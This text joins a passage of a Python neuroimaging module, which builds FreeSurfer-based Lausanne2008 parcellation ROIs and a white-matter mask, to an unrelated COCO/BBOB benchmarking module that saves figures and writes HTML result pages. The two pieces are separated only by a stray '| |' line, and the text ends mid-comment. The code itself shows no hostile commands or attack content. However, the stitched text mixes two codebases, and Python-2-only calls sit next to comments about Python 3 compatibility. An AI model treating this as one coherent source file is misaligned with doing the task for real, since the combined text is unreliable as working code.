    mri_cmd = """mri_label2vol --label "%s" --label "%s" --label "%s" --label "%s" --temp "%s" --o "%s" --identity """ % (rhun, lhun, rhco, lhco, op.join(op.join(subjects_dir, subject_id), 'mri', 'orig.mgz'), op.join(fs_label_dir, 'cc_unknown.nii.gz') )
    runCmd(mri_cmd, log)
    runCmd('mris_volmask %s' % subject_id, log)
    # Convert ribbon and aseg to NIfTI for the downstream numpy steps.
    mri_cmd = 'mri_convert -i "%s/mri/ribbon.mgz" -o "%s/mri/ribbon.nii.gz"' % (op.join(subjects_dir, subject_id), op.join(subjects_dir, subject_id))
    runCmd(mri_cmd, log)
    mri_cmd = 'mri_convert -i "%s/mri/aseg.mgz" -o "%s/mri/aseg.nii.gz"' % (
        op.join(subjects_dir, subject_id), op.join(subjects_dir, subject_id))
    runCmd(mri_cmd, log)
    iflogger.info("[ DONE ]")
def create_roi(subject_id, subjects_dir, fs_dir, parcellation_name, dilation):
    """ Creates the ROI_%s.nii.gz files using the given parcellation information
    from networks. Iteratively create volume.

    Subcortical regions are copied from aseg; cortical regions are rasterized
    from their FreeSurfer label files.  When `dilation` is true, cortical
    parcels are additionally grown into unlabelled aseg grey-matter voxels and
    saved as ROIv_%s.nii.gz. """
    iflogger.info("Create the ROIs:")
    output_dir = op.abspath(op.curdir)
    fs_dir = op.join(subjects_dir, subject_id)
    cmp_config = cmp.configuration.PipelineConfiguration()
    cmp_config.parcellation_scheme = "Lausanne2008"
    log = cmp_config.get_logger()
    parval = cmp_config._get_lausanne_parcellation(
        'Lausanne2008')[parcellation_name]
    pgpath = parval['node_information_graphml']
    aseg = nb.load(op.join(fs_dir, 'mri', 'aseg.nii.gz'))
    asegd = aseg.get_data()
    # identify cortical voxels, right (3) and left (42) hemispheres
    idxr = np.where(asegd == 3)
    idxl = np.where(asegd == 42)
    xx = np.concatenate((idxr[0], idxl[0]))
    yy = np.concatenate((idxr[1], idxl[1]))
    zz = np.concatenate((idxr[2], idxl[2]))
    # initialize variables necessary for cortical ROIs dilation
    # dimensions of the neighbourhood for rois labels assignment (choose odd dimensions!)
    shape = (25, 25, 25)
    center = np.array(shape) // 2
    # dist: distances from the center of the neighbourhood
    dist = np.zeros(shape, dtype='float32')
    for x in range(shape[0]):
        for y in range(shape[1]):
            for z in range(shape[2]):
                distxyz = center - [x, y, z]
                dist[x, y, z] = np.sqrt(np.sum(np.multiply(distxyz, distxyz)))
    iflogger.info("Working on parcellation: ")
    iflogger.info(cmp_config._get_lausanne_parcellation(
        'Lausanne2008')[parcellation_name])
    iflogger.info("========================")
    pg = nx.read_graphml(pgpath)
    # each node represents a brain region
    # create a big 256^3 volume for storage of all ROIs
    rois = np.zeros((256, 256, 256), dtype=np.int16)
    count = 0
    for brk, brv in pg.nodes_iter(data=True):
        count = count + 1
        iflogger.info(brv)
        iflogger.info(brk)
        # NOTE(review): if dn_hemisphere is neither 'left' nor 'right',
        # `hemi` silently keeps its value from the previous node (or is
        # unbound on the first one) — TODO confirm the graphml always
        # provides a valid hemisphere for cortical nodes.
        if brv['dn_hemisphere'] == 'left':
            hemi = 'lh'
        elif brv['dn_hemisphere'] == 'right':
            hemi = 'rh'
        if brv['dn_region'] == 'subcortical':
            iflogger.info(brv)
            iflogger.info("---------------------")
            iflogger.info("Work on brain region: %s" % (brv['dn_region']))
            iflogger.info("Freesurfer Name: %s" % brv['dn_fsname'])
            iflogger.info("Region %s of %s " % (count, pg.number_of_nodes()))
            iflogger.info("---------------------")
            # if it is subcortical, retrieve roi from aseg
            idx = np.where(asegd == int(brv['dn_fs_aseg_val']))
            rois[idx] = int(brv['dn_correspondence_id'])
        elif brv['dn_region'] == 'cortical':
            iflogger.info(brv)
            iflogger.info("---------------------")
            iflogger.info("Work on brain region: %s" % (brv['dn_region']))
            iflogger.info("Freesurfer Name: %s" % brv['dn_fsname'])
            iflogger.info("Region %s of %s " % (count, pg.number_of_nodes()))
            iflogger.info("---------------------")
            labelpath = op.join(
                output_dir, parval['fs_label_subdir_name'] % hemi)
            # construct .label file name
            fname = '%s.%s.label' % (hemi, brv['dn_fsname'])
            # execute fs mri_label2vol to generate volume roi from the label file
            # store it in temporary file to be overwritten for each region
            mri_cmd = 'mri_label2vol --label "%s" --temp "%s" --o "%s" --identity' % (op.join(labelpath, fname),
                                                                                     op.join(fs_dir, 'mri', 'orig.mgz'), op.join(output_dir, 'tmp.nii.gz'))
            runCmd(mri_cmd, log)
            tmp = nb.load(op.join(output_dir, 'tmp.nii.gz'))
            tmpd = tmp.get_data()
            # find voxel and set them to intensityvalue in rois
            idx = np.where(tmpd == 1)
            rois[idx] = int(brv['dn_correspondence_id'])
    # store volume eg in ROI_scale33.nii.gz
    out_roi = op.abspath('ROI_%s.nii.gz' % parcellation_name)
    # update the header
    hdr = aseg.get_header()
    hdr2 = hdr.copy()
    hdr2.set_data_dtype(np.uint16)
    log.info("Save output image to %s" % out_roi)
    img = nb.Nifti1Image(rois, aseg.get_affine(), hdr2)
    nb.save(img, out_roi)
    iflogger.info("[ DONE ]")
    # dilate cortical regions
    if dilation:
        iflogger.info("Dilating cortical regions...")
        # loop throughout all the voxels belonging to the aseg GM volume
        for j in range(xx.size):
            if rois[xx[j], yy[j], zz[j]] == 0:
                # assign the nearest label within the 25^3 neighbourhood
                local = extract(
                    rois, shape, position=(xx[j], yy[j], zz[j]), fill=0)
                mask = local.copy()
                mask[np.nonzero(local > 0)] = 1
                thisdist = np.multiply(dist, mask)
                thisdist[np.nonzero(thisdist == 0)] = np.amax(thisdist)
                value = np.int_(
                    local[np.nonzero(thisdist == np.amin(thisdist))])
                if value.size > 1:
                    # break ties by the most frequent label
                    counts = np.bincount(value)
                    value = np.argmax(counts)
                rois[xx[j], yy[j], zz[j]] = value
        # store volume eg in ROIv_scale33.nii.gz
        out_roi = op.abspath('ROIv_%s.nii.gz' % parcellation_name)
        iflogger.info("Save output image to %s" % out_roi)
        img = nb.Nifti1Image(rois, aseg.get_affine(), hdr2)
        nb.save(img, out_roi)
        iflogger.info("[ DONE ]")
def create_wm_mask(subject_id, subjects_dir, fs_dir, parcellation_name):
    """Build the 1mm white-matter mask ``fsmask_1mm.nii.gz`` for tractography.

    Starts from the FreeSurfer ribbon, removes eroded ventricles/CSF, grey
    nuclei and the brainstem, adds back corpus-callosum/unknown voxels and
    finally subtracts the cortical ROIs of `parcellation_name`.
    """
    iflogger.info("Create white matter mask")
    fs_dir = op.join(subjects_dir, subject_id)
    cmp_config = cmp.configuration.PipelineConfiguration()
    cmp_config.parcellation_scheme = "Lausanne2008"
    pgpath = cmp_config._get_lausanne_parcellation(
        'Lausanne2008')[parcellation_name]['node_information_graphml']
    # load ribbon as basis for white matter mask
    fsmask = nb.load(op.join(fs_dir, 'mri', 'ribbon.nii.gz'))
    fsmaskd = fsmask.get_data()
    wmmask = np.zeros(fsmaskd.shape)
    # extract right and left white matter
    idx_lh = np.where(fsmaskd == 120)
    idx_rh = np.where(fsmaskd == 20)
    wmmask[idx_lh] = 1
    wmmask[idx_rh] = 1
    # remove subcortical nuclei from white matter mask
    aseg = nb.load(op.join(fs_dir, 'mri', 'aseg.nii.gz'))
    asegd = aseg.get_data()
    try:
        import scipy.ndimage.morphology as nd
    except ImportError:
        raise Exception('Need scipy for binary erosion of white matter mask')
    # need binary erosion function
    imerode = nd.binary_erosion
    # ventricle erosion
    csfA = np.zeros(asegd.shape)
    csfB = np.zeros(asegd.shape)
    # structuring elements for erosion
    se1 = np.zeros((3, 3, 5))
    se1[1, :, 2] = 1
    se1[:, 1, 2] = 1
    se1[1, 1, :] = 1
    se = np.zeros((3, 3, 3))
    se[1, :, 1] = 1
    se[:, 1, 1] = 1
    se[1, 1, :] = 1
    # lateral ventricles, thalamus proper and caudate
    # the latter two removed for better erosion, but put back afterwards
    idx = np.where((asegd == 4) |
                   (asegd == 43) |
                   (asegd == 11) |
                   (asegd == 50) |
                   (asegd == 31) |
                   (asegd == 63) |
                   (asegd == 10) |
                   (asegd == 49))
    csfA[idx] = 1
    csfA = imerode(imerode(csfA, se1), se)
    # thalmus proper and cuadate are put back because they are not lateral ventricles
    idx = np.where((asegd == 11) |
                   (asegd == 50) |
                   (asegd == 10) |
                   (asegd == 49))
    csfA[idx] = 0
    # rest of CSF, i.e. 3rd and 4th ventricle and extracerebral CSF
    # 43 ??, 4?? 213?, 221?
    # more to discuss.
    # NOTE(review): a combined np.where over these same labels used to be
    # computed here but its result was never read (the loop below rebinds
    # `idx`), so the dead statement was removed.
    for i in [5, 14, 15, 24, 44, 72, 75, 76, 213, 221]:
        idx = np.where(asegd == i)
        csfB[idx] = 1
    # do not remove the subthalamic nucleus for now from the wm mask
    # 23, 60
    # would stop the fiber going to the segmented "brainstem"
    # grey nuclei, either with or without erosion
    gr_ncl = np.zeros(asegd.shape)
    # with erosion
    for i in [10, 11, 12, 49, 50, 51]:
        idx = np.where(asegd == i)
        # temporary volume
        tmp = np.zeros(asegd.shape)
        tmp[idx] = 1
        tmp = imerode(tmp, se)
        idx = np.where(tmp == 1)
        gr_ncl[idx] = 1
    # without erosion
    for i in [13, 17, 18, 26, 52, 53, 54, 58]:
        idx = np.where(asegd == i)
        gr_ncl[idx] = 1
    # remove remaining structure, e.g. brainstem
    remaining = np.zeros(asegd.shape)
    idx = np.where(asegd == 16)
    remaining[idx] = 1
    # now remove all the structures from the white matter
    idx = np.where(
        (csfA != 0) | (csfB != 0) | (gr_ncl != 0) | (remaining != 0))
    wmmask[idx] = 0
    iflogger.info("Removing lateral ventricles and eroded grey nuclei and brainstem from white matter mask")
    # ADD voxels from 'cc_unknown.nii.gz' dataset
    ccun = nb.load(op.join(fs_dir, 'label', 'cc_unknown.nii.gz'))
    ccund = ccun.get_data()
    idx = np.where(ccund != 0)
    iflogger.info("Add corpus callosum and unknown to wm mask")
    wmmask[idx] = 1
    # check if we should subtract the cortical rois from this parcellation
    iflogger.info("Loading %s to subtract cortical ROIs from white matter mask" % ('ROI_%s.nii.gz' % parcellation_name))
    roi = nb.load(op.join(op.curdir, 'ROI_%s.nii.gz' % parcellation_name))
    roid = roi.get_data()
    assert roid.shape[0] == wmmask.shape[0]
    pg = nx.read_graphml(pgpath)
    for brk, brv in pg.nodes_iter(data=True):
        if brv['dn_region'] == 'cortical':
            iflogger.info("Subtracting region %s with intensity value %s" %
                          (brv['dn_region'], brv['dn_correspondence_id']))
            idx = np.where(roid == int(brv['dn_correspondence_id']))
            wmmask[idx] = 0
    # output white matter mask. crop and move it afterwards
    wm_out = op.join(fs_dir, 'mri', 'fsmask_1mm.nii.gz')
    img = nb.Nifti1Image(wmmask, fsmask.get_affine(), fsmask.get_header())
    iflogger.info("Save white matter mask: %s" % wm_out)
    nb.save(img, wm_out)
def crop_and_move_datasets(subject_id, subjects_dir, fs_dir, parcellation_name, out_roi_file, dilation):
    """Reslice the parcellation outputs back to the original T1 grid and
    copy them into the current working directory.

    Raises when any expected source file is missing.
    """
    fs_dir = op.join(subjects_dir, subject_id)
    cmp_config = cmp.configuration.PipelineConfiguration()
    cmp_config.parcellation_scheme = "Lausanne2008"
    log = cmp_config.get_logger()
    output_dir = op.abspath(op.curdir)
    iflogger.info("Cropping and moving datasets to %s" % output_dir)
    # (source, destination) pairs
    ds = [
        (op.join(fs_dir, 'mri', 'aseg.nii.gz'),
         op.abspath('aseg.nii.gz')),
        (op.join(fs_dir, 'mri', 'ribbon.nii.gz'),
         op.abspath('ribbon.nii.gz')),
        (op.join(fs_dir, 'mri', 'fsmask_1mm.nii.gz'),
         op.abspath('fsmask_1mm.nii.gz')),
        (op.join(fs_dir, 'label', 'cc_unknown.nii.gz'),
         op.abspath('cc_unknown.nii.gz'))
    ]
    ds.append((op.abspath('ROI_%s.nii.gz' % parcellation_name),
               op.abspath('ROI_HR_th.nii.gz')))
    if dilation:
        ds.append((op.abspath('ROIv_%s.nii.gz' % parcellation_name),
                   op.abspath('ROIv_HR_th.nii.gz')))
    orig = op.join(fs_dir, 'mri', 'orig', '001.mgz')
    for d in ds:
        iflogger.info("Processing %s:" % d[0])
        if not op.exists(d[0]):
            raise Exception('File %s does not exist.' % d[0])
        # reslice to original volume because the roi creation with freesurfer
        # changed to 256x256x256 resolution
        mri_cmd = 'mri_convert -rl "%s" -rt nearest "%s" -nc "%s"' % (
            orig, d[0], d[1])
        runCmd(mri_cmd, log)
def extract(Z, shape, position, fill):
    """ Extract voxel neighbourhood

    Parameters
    ----------
    Z: the original data
    shape: tuple containing neighbourhood dimensions
    position: tuple containing central point indexes
    fill: value for the padding of Z

    Returns
    -------
    R: the neighbourhood of the specified point in Z
    """
    # output neighbourhood, pre-filled with the padding value
    R = np.ones(shape, dtype=Z.dtype) * fill
    P = np.array(list(position)).astype(int)
    Rs = np.array(list(R.shape)).astype(int)
    Zs = np.array(list(Z.shape)).astype(int)
    # window bounds inside Z before clipping; the window is centred on P
    # and has exactly the requested extent (Rs // 2 + Rs % 2 on the right)
    Z_lo = P - Rs // 2
    Z_hi = Z_lo + Rs
    # clip the window at the volume borders
    Z_lo_c = np.maximum(Z_lo, 0)
    Z_hi_c = np.minimum(Z_hi, Zs)
    # matching bounds inside the output block (shifted by how much was clipped)
    R_lo = Z_lo_c - Z_lo
    R_hi = Rs - (Z_hi - Z_hi_c)
    R[R_lo[0]:R_hi[0], R_lo[1]:R_hi[1], R_lo[2]:R_hi[2]] = \
        Z[Z_lo_c[0]:Z_hi_c[0], Z_lo_c[1]:Z_hi_c[1], Z_lo_c[2]:Z_hi_c[2]]
    return R
class ParcellateInputSpec(BaseInterfaceInputSpec):
    """Input specification for the :class:`Parcellate` interface."""
    subject_id = traits.String(mandatory=True, desc='Subject ID')
    # Lausanne2008 resolution; first positional value is the default
    parcellation_name = traits.Enum('scale500', ['scale33', 'scale60', 'scale125', 'scale250', 'scale500'], usedefault=True)
    freesurfer_dir = Directory(exists=True, desc='Freesurfer main directory')
    subjects_dir = Directory(exists=True, desc='Freesurfer subjects directory')
    out_roi_file = File(
        genfile=True, desc='Region of Interest file for connectivity mapping')
    dilation = traits.Bool(False, usedefault=True,
                           desc='Dilate cortical parcels? Useful for fMRI connectivity')
class ParcellateOutputSpec(TraitedSpec):
    """Output specification for the :class:`Parcellate` interface."""
    roi_file = File(
        exists=True, desc='Region of Interest file for connectivity mapping')
    # only produced when the `dilation` input is enabled, hence no exists=True
    roiv_file = File(desc='Region of Interest file for fMRI connectivity mapping')
    white_matter_mask_file = File(exists=True, desc='White matter mask file')
    cc_unknown_file = File(
        desc='Image file with regions labelled as unknown cortical structures',
        exists=True)
    ribbon_file = File(desc='Image file detailing the cortical ribbon',
                       exists=True)
    aseg_file = File(
        desc='Automated segmentation file converted from Freesurfer "subjects" directory',
        exists=True)
    roi_file_in_structural_space = File(
        desc='ROI image resliced to the dimensions of the original structural image',
        exists=True)
    # only produced when the `dilation` input is enabled
    dilated_roi_file_in_structural_space = File(
        desc='dilated ROI image resliced to the dimensions of the original structural image')
class Parcellate(BaseInterface):
    """Subdivides segmented ROI file into smaller subregions

    This interface implements the same procedure as in the ConnectomeMapper's
    parcellation stage (cmp/stages/parcellation/maskcreation.py) for a single
    parcellation scheme (e.g. 'scale500').

    Example
    -------
    >>> import nipype.interfaces.cmtk as cmtk
    >>> parcellate = cmtk.Parcellate()
    >>> parcellate.inputs.freesurfer_dir = '.'
    >>> parcellate.inputs.subjects_dir = '.'
    >>> parcellate.inputs.subject_id = 'subj1'
    >>> parcellate.inputs.dilation = True
    >>> parcellate.inputs.parcellation_name = 'scale500'
    >>> parcellate.run()                 # doctest: +SKIP
    """
    input_spec = ParcellateInputSpec
    output_spec = ParcellateOutputSpec

    def _run_interface(self, runtime):
        """Run the four parcellation steps for the configured subject."""
        if self.inputs.subjects_dir:
            os.environ.update({'SUBJECTS_DIR': self.inputs.subjects_dir})
        subject_dir = op.join(self.inputs.subjects_dir, self.inputs.subject_id)
        if not os.path.exists(subject_dir):
            # previously a message-less `raise Exception`
            raise Exception('Subject directory %s does not exist' % subject_dir)
        iflogger.info("ROI_HR_th.nii.gz / fsmask_1mm.nii.gz CREATION")
        iflogger.info("=============================================")
        create_annot_label(self.inputs.subject_id, self.inputs.subjects_dir, self.inputs.freesurfer_dir, self.inputs.parcellation_name)
        create_roi(self.inputs.subject_id, self.inputs.subjects_dir, self.inputs.freesurfer_dir, self.inputs.parcellation_name, self.inputs.dilation)
        create_wm_mask(self.inputs.subject_id, self.inputs.subjects_dir, self.inputs.freesurfer_dir, self.inputs.parcellation_name)
        crop_and_move_datasets(self.inputs.subject_id, self.inputs.subjects_dir, self.inputs.freesurfer_dir, self.inputs.parcellation_name, self.inputs.out_roi_file, self.inputs.dilation)
        return runtime

    def _list_outputs(self):
        """Map the files produced in the working directory to output traits."""
        outputs = self._outputs().get()
        if isdefined(self.inputs.out_roi_file):
            outputs['roi_file'] = op.abspath(self.inputs.out_roi_file)
        else:
            outputs['roi_file'] = op.abspath(
                self._gen_outfilename('nii.gz', 'ROI'))
        if self.inputs.dilation:
            outputs['roiv_file'] = op.abspath(self._gen_outfilename(
                'nii.gz', 'ROIv'))
        outputs['white_matter_mask_file'] = op.abspath('fsmask_1mm.nii.gz')
        outputs['cc_unknown_file'] = op.abspath('cc_unknown.nii.gz')
        outputs['ribbon_file'] = op.abspath('ribbon.nii.gz')
        outputs['aseg_file'] = op.abspath('aseg.nii.gz')
        outputs['roi_file_in_structural_space'] = op.abspath(
            'ROI_HR_th.nii.gz')
        if self.inputs.dilation:
            outputs['dilated_roi_file_in_structural_space'] = op.abspath(
                'ROIv_HR_th.nii.gz')
        return outputs

    def _gen_outfilename(self, ext, prefix='ROI'):
        """Build e.g. ``ROI_scale500.nii.gz`` from prefix, scale and extension."""
        return prefix + '_' + self.inputs.parcellation_name + '.' + ext
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Generic routines for figure generation."""
from __future__ import absolute_import
import os
from collections import OrderedDict
from operator import itemgetter
from itertools import groupby
import warnings
import numpy as np
from matplotlib import pyplot as plt
import shutil
# from pdb import set_trace
from . import genericsettings, toolsstats, htmldesc # absolute_import => . refers to where ppfig resides in the package
# Per-format keyword value passed to plt.savefig(bbox_inches=...);
# 'tight' trims surrounding whitespace for SVG output.
bbox_inches_choices = {  # do we also need pad_inches = 0?
    'svg': 'tight',
}
def enum(*sequential, **named):
    """Create a simple enum-like class: each name in `sequential` is mapped
    to its index (0, 1, ...), while keyword arguments keep their values."""
    members = {label: index for index, label in enumerate(sequential)}
    members.update(named)
    return type('Enum', (), members)
# How many algorithms a generated page compares; drives the page layout
# in save_single_functions_html.
AlgorithmCount = enum('NON_SPECIFIED', 'ONE', 'TWO', 'MANY')
def saveFigure(filename, figFormat=(), verbose=True):
    """Save the current matplotlib figure into one image file per format.

    `figFormat` can be a string or a list of strings, like
    ``('pdf', 'svg')``; when empty, the formats configured in
    `genericsettings` are used.  SVG output is temporarily downsized for
    browser display and restored afterwards.
    """
    if not figFormat:
        figFormat = genericsettings.getFigFormats()
    if isinstance(figFormat, basestring):
        figFormat = (figFormat, )
    # `fig_format` instead of `format`: avoid shadowing the builtin
    for fig_format in figFormat:
        # a hack for making smaller figures for browser display
        if fig_format == 'svg':
            svg_downsize_factor = 0.8
            # pretty desperate way to get a smaller figure
            plt.gcf().set_size_inches([svg_downsize_factor * v for v in
                                       plt.gcf().get_size_inches()])
        try:
            plt.savefig(filename + '.' + fig_format,
                        dpi=60 if genericsettings.in_a_hurry else 300,
                        format=fig_format,
                        bbox_inches=bbox_inches_choices.get(fig_format, None)
                        )
            if verbose:
                # parenthesized form prints identically on Python 2 and 3
                print('Wrote figure in %s.' % (filename + '.' + fig_format))
        except IOError:
            warnings.warn('%s is not writeable.' % (filename + '.' + fig_format))
        # undo the SVG downsizing so subsequent saves are unaffected
        if fig_format == 'svg':
            plt.gcf().set_size_inches([v / svg_downsize_factor for v in
                                       plt.gcf().get_size_inches()])
# Skeleton of every generated HTML page; the three %s slots receive, in
# order: the page <TITLE>, the algorithm name (<H1>) and an optional
# warning message (<H2>).
html_header = """<HTML>
<HEAD>
<META NAME="description" CONTENT="COCO/BBOB figures by function">
<META NAME="keywords" CONTENT="COCO, BBOB">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE> %s </TITLE>
<SCRIPT SRC="sorttable.js"></SCRIPT>
</HEAD>
<BODY>
<H1> %s
</H1>
<H2 style="color:red"> %s </H2>
"""
def next_dimension_str(s):
    """Return `s` with its embedded two-digit dimension replaced by the
    next dimension (see `next_dimension`).

    Emits a warning and re-raises when no dimension can be parsed from `s`.
    """
    try:
        dim = int(s.strip().strip('_').rstrip('D'))
        return s.replace('%02d' % dim, '%02d' % next_dimension(dim))
    except Exception:
        # narrowed from a bare `except:`; the exception is still re-raised
        # after the diagnostics below
        warnings.warn('next_dimension_str failed on "%s"' % s)
        print(s)
        raise
def next_dimension(dim):
    """next dimension when clicking single function html pages"""
    # 2 -> 3 -> 5 are special-cased and 40 wraps around to 2;
    # every other dimension simply doubles
    special_successors = {2: 3, 3: 5, 40: 2}
    return special_successors.get(dim, 2 * dim)
def save_single_functions_html(filename, algname='', extension='svg',
                               add_to_names = '', algorithmCount = AlgorithmCount.NON_SPECIFIED,
                               values_of_interest = []):
    """Write the HTML overview page ``filename + add_to_names + '.html'``.

    The sections emitted depend on `algorithmCount` (ONE, TWO, MANY or
    NON_SPECIFIED): grids of per-function ERT figures, ECDF sections and
    HTML-comment placeholders that later table-generation steps replace.
    `values_of_interest` is read only on the single-algorithm page
    (assumed to provide ``labels()``/``loglabels()`` — TODO confirm with
    callers).
    """
    name = filename.split(os.sep)[-1]
    with open(filename + add_to_names + '.html', 'w') as f:
        header_title = algname + ' ' + name + add_to_names
        imageWarning = '' if extension in genericsettings.getFigFormats() else 'For generating figures use the --svg option.'
        f.write(html_header % (header_title.strip().replace(' ', ', '), algname, imageWarning))
        captionStringFormat = '<p/>\n%s\n<p/><p/>'
        if algorithmCount is AlgorithmCount.ONE:
            # single-algorithm page
            headerERT = 'Expected number of <i>f</i>-evaluations to reach target'
            f.write("<H2> %s </H2>\n" % headerERT)
            # clicking the figure grid jumps to the next dimension's page
            if add_to_names.endswith('D'):
                name_for_click = next_dimension_str(add_to_names)
                f.write('<A HREF="%s">\n' % (filename.split(os.sep)[-1] + name_for_click + '.html'))
            for ifun in range(1, 25):
                f.write('<IMG SRC="ppfigdim_f%03d' % (ifun)
                        + add_to_names + '.%s">' % (extension))
            if add_to_names.endswith('D'):
                f.write('"\n</A>\n')
            key = 'bbobppfigdimlegendrlbased' if genericsettings.runlength_based_targets else 'bbobppfigdimlegendfixed'
            joined_values_of_interest = ', '.join(values_of_interest.labels()) if genericsettings.runlength_based_targets else ', '.join(values_of_interest.loglabels())
            f.write(captionStringFormat % htmldesc.getValue('##' + key + '##')
                    .replace('valuesofinterest', joined_values_of_interest))
            headerERT = 'ERT in number of function evaluations'
            f.write("<H2> %s </H2>\n" % headerERT)
            # placeholder replaced later by the generated table
            f.write("\n<!--pptableHtml-->\n")
            f.write(captionStringFormat % htmldesc.getValue('##bbobpptablecaption##'))
            names = ['pprldistr', 'ppfvdistr']
            dimensions = [5, 20]
            types = OrderedDict([
                ('separ', 'Separable functions'),
                ('lcond', 'Misc. moderate functions'),
                ('hcond', 'Ill-conditioned functions'),
                ('multi', 'Multi-modal functions'),
                ('mult2', 'Weak structure functions'),
                ('noiselessall', 'All functions')])
            headerECDF = ' Empirical cumulative distribution functions (ECDF)'
            f.write("<H2> %s </H2>\n" % headerECDF)
            for dimension in dimensions:
                for typeKey, typeValue in types.iteritems():
                    f.write('<p><b>%s in %d-D</b></p>' % (typeValue, dimension))
                    f.write('<div>')
                    for name in names:
                        f.write('<IMG SRC="%s_%02dD_%s.%s">' % (name, dimension, typeKey, extension))
                    f.write('</div>')
            key = 'bbobpprldistrlegendrlbased' if genericsettings.runlength_based_targets else 'bbobpprldistrlegendfixed'
            f.write(captionStringFormat % htmldesc.getValue('##' + key + '##'))
            headerERTLoss = 'ERT loss ratios'
            f.write("<H2> %s </H2>\n" % headerERTLoss)
            for dimension in dimensions:
                f.write('<IMG SRC="pplogloss_%02dD_noiselessall.%s">' % (dimension, extension))
            f.write("\n<!--tables-->\n")
            f.write(captionStringFormat % htmldesc.getValue('##bbobloglosstablecaption##'))
            types = OrderedDict([
                ('separ', 'Separable functions'),
                ('lcond', 'Moderate functions'),
                ('hcond', 'Ill-conditioned functions'),
                ('multi', 'Multi-modal functions'),
                ('mult2', 'Weak structure functions')])
            for typeKey, typeValue in types.iteritems():
                f.write('<p><b>%s in %s</b></p>' % (typeValue, '-D and '.join(str(x) for x in dimensions) + '-D'))
                f.write('<div>')
                for dimension in dimensions:
                    f.write('<IMG SRC="pplogloss_%02dD_%s.%s">' % (dimension, typeKey, extension))
                f.write('</div>')
            f.write(captionStringFormat % htmldesc.getValue('##bbobloglossfigurecaption##'))
        elif algorithmCount is AlgorithmCount.TWO:
            # two-algorithm comparison page
            headerERT = 'Scaling of ERT with dimension'
            f.write("\n<H2> %s </H2>\n" % headerERT)
            for ifun in range(1, 25):
                f.write('<IMG SRC="ppfigs_f%03d' % (ifun)
                        + add_to_names + '.%s">' % (extension))
            f.write(captionStringFormat % '##bbobppfigslegend##')
            headerERT = 'Scatter plots per function'
            f.write("\n<H2> %s </H2>\n" % headerERT)
            if add_to_names.endswith('D'):
                name_for_click = next_dimension_str(add_to_names)
                f.write('<A HREF="%s">\n' % (filename.split(os.sep)[-1] + name_for_click + '.html'))
            for ifun in range(1, 25):
                f.write('<IMG SRC="ppscatter_f%03d' % (ifun)
                        + add_to_names + '.%s">' % (extension))
            if add_to_names.endswith('D'):
                f.write('"\n</A>\n')
            f.write(captionStringFormat % '##bbobppscatterlegend##')
            names = ['pprldistr', 'pplogabs']
            dimensions = [5, 20]
            types = OrderedDict([
                ('separ', 'Separable functions'),
                ('lcond', 'Moderate functions'),
                ('hcond', 'Ill-conditioned functions'),
                ('multi', 'Multi-modal functions'),
                ('mult2', 'Weak structure functions'),
                ('noiselessall', 'All functions')])
            headerECDF = 'Empirical cumulative distribution functions (ECDFs) per function group'
            f.write("\n<H2> %s </H2>\n" % headerECDF)
            for dimension in dimensions:
                for typeKey, typeValue in types.iteritems():
                    f.write('<p><b>%s in %d-D</b></p>' % (typeValue, dimension))
                    f.write('<div>')
                    for name in names:
                        f.write('<IMG SRC="%s_%02dD_%s.%s">' % (name, dimension, typeKey, extension))
                    f.write('</div>')
            key = 'bbobpprldistrlegendtworlbased' if genericsettings.runlength_based_targets else 'bbobpprldistrlegendtwofixed'
            f.write(captionStringFormat % htmldesc.getValue('##' + key + '##'))
            headerERT = 'Table showing the ERT in number of function evaluations divided by the best ERT measured during BBOB-2009'
            f.write("\n<H2> %s </H2>\n" % headerERT)
            f.write("\n<!--pptable2Html-->\n")
            f.write(captionStringFormat % '##bbobpptablestwolegend##')
        elif algorithmCount is AlgorithmCount.MANY:
            # many-algorithm page; ECDFs and tables come from helpers
            headerERT = 'Scaling of ERT with dimension'
            f.write("\n<H2> %s </H2>\n" % headerERT)
            if add_to_names.endswith('D'):
                name_for_click = next_dimension_str(add_to_names)
                f.write('<A HREF="%s">\n' % (filename.split(os.sep)[-1] + name_for_click + '.html'))
            for ifun in range(1, 25):
                f.write('<IMG SRC="ppfigs_f%03d' % (ifun)
                        + add_to_names + '.%s">' % (extension))
            if add_to_names.endswith('D'):
                f.write('"\n</A>\n')
            f.write(captionStringFormat % '##bbobppfigslegend##')
            write_ECDF(f, 5, extension, captionStringFormat)
            write_ECDF(f, 20, extension, captionStringFormat)
            write_pptables(f, 5, captionStringFormat)
            write_pptables(f, 20, captionStringFormat)
        elif algorithmCount is AlgorithmCount.NON_SPECIFIED:
            # generic page: a figure grid named after the file itself
            headerERT = 'Scaling of ERT with dimension'
            f.write("\n<H2> %s </H2>\n" % headerERT)
            if add_to_names.endswith('D'):
                name_for_click = next_dimension_str(add_to_names)
                f.write('<A HREF="%s">\n' % (name + name_for_click + '.html'))
            for ifun in range(1, 25):
                f.write('<IMG SRC="'+ name + '_f%03d' % (ifun)
                        + add_to_names + '.%s">' % (extension))
            if add_to_names.endswith('D'):
                f.write('"\n</A>\n')
        f.write("\n</BODY>\n</HTML>")
def write_ECDF(f, dimension, extension, captionStringFormat):
    """Writes the ECDF section (header, one image per function group,
    caption placeholder) for one dimension to an open HTML file.

    :param f: open (HTML) file-like object written to
    :param dimension: problem dimension, used in header and image names
    :param extension: image file extension, e.g. 'png' or 'svg'
    :param captionStringFormat: format string applied to the caption key
    """
    names = ['pprldmany']
    types = OrderedDict([
        ('separ', 'Separable functions'),
        ('lcond', 'Moderate functions'),
        ('hcond', 'Ill-conditioned functions'),
        ('multi', 'Multi-modal functions'),
        ('mult2', 'Weakly structured multi-modal functions'),
        ('noiselessall', 'All functions')])
    headerECDF = 'Empirical Cumulative Distribution Functions (ECDFs) per function group for dimension %d' % dimension
    f.write("\n<H2> %s </H2>\n" % headerECDF)
    # .items() instead of the Python-2-only .iteritems(); iteration order is
    # still the OrderedDict insertion order under both Python 2 and 3.
    for typeKey, typeValue in types.items():
        f.write('<p><b>%s</b></p>' % typeValue)
        for name in names:
            f.write('<IMG SRC="%s_%02dD_%s.%s">' % (name, dimension, typeKey, extension))
    f.write(captionStringFormat % ('\n##bbobECDFslegend%d##' % dimension))
def write_pptables(f, dimension, captionStringFormat):
    """Writes the ERT table section (header, one table placeholder per
    function, optional caption) for one dimension to an open HTML file.

    :param f: open (HTML) file-like object written to
    :param dimension: problem dimension, used in header and placeholders
    :param captionStringFormat: format string applied to the caption text
    """
    # NOTE: the trailing space before the line continuation is required --
